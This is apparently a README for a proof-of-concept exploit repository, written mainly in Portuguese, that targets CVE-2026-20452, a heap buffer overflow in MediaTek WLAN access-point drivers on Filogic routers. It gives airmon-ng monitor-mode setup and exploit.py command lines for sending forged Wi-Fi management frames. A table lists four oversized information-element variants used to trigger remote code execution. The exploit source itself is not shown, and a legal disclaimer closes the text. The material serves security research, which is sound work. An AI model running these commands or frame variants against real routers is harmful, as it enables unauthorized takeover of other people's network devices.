
Exploit de prova de conceito para CVE-2026-20452, um estouro de buffer baseado em heap nos drivers WLAN AP da MediaTek. Usa scapy para enviar frames de gerenciamento Wi-Fi forjados e acionar a execução remota de código em roteadores Filogic afetados.
Exploit de prova de conceito para o CVE-2026-20452, um estouro de buffer baseado em heap no driver de WLAN Access Point da MediaTek.
https://www.hunt-benito.com/blog/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/
pip install scapy)sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Interface becomes wlan0mon
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
--overflow-size 1024 --variant 2 --count 50 --delay 0.05
Esta ferramenta é fornecida exclusivamente para pesquisa de segurança autorizada e fins educacionais. A transmissão em frequências Wi-Fi pode exigir autorização legal em sua jurisdição. O uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal. Os autores não assumem nenhuma responsabilidade e não se responsabilizam por qualquer uso indevido ou dano causado por esta ferramenta.
| Variante | Tipo de IE | Descrição |
|---|
| 0 | Vendor Specific (221) | IE único superdimensionado com OUI 00:50:43 |
| 1 | Chained Vendor IEs | Vários IEs pequenos para corromper objetos de heap adjacentes |
| 2 | HT Capabilities (45) | IE de HT Capabilities superdimensionado |
| 3 | Extended Capabilities (127) | IE de Extended Capabilities superdimensionado |